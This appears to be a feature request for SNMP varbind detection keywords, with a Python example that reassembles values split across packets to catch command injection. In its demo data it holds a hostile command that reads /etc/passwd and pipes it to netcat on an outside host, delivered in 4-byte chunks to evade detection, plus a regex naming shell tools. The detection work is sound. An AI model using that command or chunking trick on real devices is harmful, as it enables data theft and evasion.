Feature #8691: detect: SNMP Varbind Keywords

Added by Stuart DC 4 days ago. Updated 1 day ago.

Status: Triaged
Priority: Normal
Assignee:
Target version:
Effort:
Difficulty:
Label:

Description

In recent exploitation of CVE-2025-20352, it would have been ideal to alert on shell metacharacters in a reconstructed SNMP value across a session, but since the commands were split across multiple SNMP packets, each carrying a small payload, this made detection nearly impossible without major performance implications.

SNMP can carry multiple varbinds in a single request. Each varbind appears as a triplet:
  • snmp.oid - (sticky buffer) keyword to match exactly or a prefix (subtree) OID
  • snmp.data_type - (e.g. int32 - "2", octet string - "Cisco IOS Software, Catalyst 4500", counter32/64 - "41239842", time ticks - "1452300", ip address - "192.168.1.50", null - "0x0500")
  • snmp.value - (sticky buffer) decoded [full] value across a session
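As an added, runnable illustration of the request above (example code written for this note, not Suricata's SNMP app-layer parser and not code from the reporter): a minimal BER parser pulls the OID / data type / value triplet out of each varbind, and a per-flow reassembly step concatenates the octet-string values written to the same OID across a session before the match is run. The OID 1.3.6.1.4.1.111.1.0, the community string, the flow tuple, the command payload, the 4-byte chunking and the detection pattern are all constructed for the example; the pattern is deliberately longer than one chunk so it can only match on the reassembled value. The encoder that builds the sample packets supports only short-form lengths and single-byte OID arcs, which is enough for the constructed traffic; the parser side handles long-form lengths and multi-byte arcs.

```python
"""SNMP v1/v2c varbind extraction plus cross-packet value reassembly. Added
example for feature #8691, not Suricata code; all identifiers are constructed."""
import re

TYPE_NAMES = {0x02: "integer", 0x04: "octet_string", 0x05: "null", 0x06: "oid",
              0x40: "ipaddress", 0x41: "counter32", 0x42: "gauge32",
              0x43: "timeticks", 0x46: "counter64"}
PDU_NAMES = {0xA0: "get", 0xA1: "getnext", 0xA2: "response", 0xA3: "set"}
# Constructed rule: metacharacter then a command name; multi-byte on purpose.
SHELL_PATTERN = re.compile(rb"[;|&]\s*(nc|sh|bash|wget|curl)\b")

def _read_tlv(buf, pos):                     # -> (tag, contents, next_pos)
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: N length octets follow
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(b):                          # first octet packs the first two arcs
    arcs, acc = [b[0] // 40, b[0] % 40], 0
    for byte in b[1:]:                       # base-128, high bit = continuation
        acc = (acc << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs, acc = arcs + [acc], 0
    return ".".join(map(str, arcs))

def decode_value(tag, contents):             # -> (type_name, bytes a rule matches on)
    kind = TYPE_NAMES.get(tag, "unknown")
    if tag == 0x02:                          # signed INTEGER
        return kind, b"%d" % int.from_bytes(contents, "big", signed=True)
    if tag in (0x41, 0x42, 0x43, 0x46):      # unsigned application types
        return kind, b"%d" % int.from_bytes(contents, "big")
    if tag == 0x40:                          # IpAddress is 4 raw octets
        return kind, ".".join(map(str, contents)).encode()
    return kind, _decode_oid(contents).encode() if tag == 0x06 else contents

def parse_snmp(packet):
    """Parse one SNMPv1/v2c message into community, PDU type and varbinds."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, _version, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, _request_id, pos = _read_tlv(pdu, 0)
    _, _, pos = _read_tlv(pdu, _read_tlv(pdu, pos)[2])   # error-status, -index
    _, vblist, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vblist):                 # varbind = SEQUENCE {oid, value}
        _, vb, pos = _read_tlv(vblist, pos)
        _, oid, p = _read_tlv(vb, 0)
        vtag, contents, _ = _read_tlv(vb, p)
        varbinds.append((_decode_oid(oid),) + decode_value(vtag, contents))
    return {"community": community, "pdu": PDU_NAMES.get(pdu_tag, "unknown"),
            "varbinds": varbinds}

def _tlv(tag, payload):                      # short-form length only (< 128)
    return bytes([tag, len(payload)]) + payload

def _encode_oid(dotted):                     # arcs < 128 only, enough here
    arcs = [int(x) for x in dotted.split(".")]
    return bytes([40 * arcs[0] + arcs[1]] + arcs[2:])

def build_set_request(community, request_id, oid, value):  # one octet-string varbind
    vb = _tlv(0x30, _tlv(0x06, _encode_oid(oid)) + _tlv(0x04, value))
    pdu = _tlv(0xA3, _tlv(0x02, request_id.to_bytes(4, "big", signed=True))
               + _tlv(0x02, b"\x00") + _tlv(0x02, b"\x00") + _tlv(0x30, vb))
    return _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x04, community) + pdu)

def feed(state, flow, packet):
    """Buffer octet-string values per (flow, community, OID); return (per-packet hits, session hits)."""
    msg, per_packet, session = parse_snmp(packet), [], []
    for oid, kind, value in msg["varbinds"]:
        if kind != "octet_string":
            continue
        key = (flow, msg["community"], oid)
        state[key] = state.get(key, b"") + value
        if SHELL_PATTERN.search(value):
            per_packet.append(oid)
        if SHELL_PATTERN.search(state[key]):
            session.append(oid)
    return per_packet, session

# Constructed traffic: one command written 4 bytes at a time to a made-up OID.
FLOW, OID = ("192.0.2.10", "198.51.100.5", 161), "1.3.6.1.4.1.111.1.0"
COMMAND = b"; cat /etc/passwd | nc 10.0.0.1 4444 &"
CHUNKS = [COMMAND[i:i + 4] for i in range(0, len(COMMAND), 4)]

def run_demo():
    """Return (per-packet hits, index of first session hit, reassembled value)."""
    state = {}
    hits = [feed(state, FLOW, build_set_request(b"private", 1000 + i, OID, c))
            for i, c in enumerate(CHUNKS)]
    per_packet = sum(len(pp) for pp, _ in hits)
    first_session = next((i for i, (_, s) in enumerate(hits) if s), None)
    return per_packet, first_session, state[(FLOW, b"private", OID)]
```

run_demo() returns (0, 5, COMMAND): no fragment triggers the pattern on its own, the reassembled value triggers it at the sixth packet, and the full command is what a session-wide snmp.value buffer would expose to a rule. The per-(flow, community, OID) buffer in this toy grows without bound; a real implementation needs a cap on buffered bytes per key, which is exactly the performance trade-off the description points at.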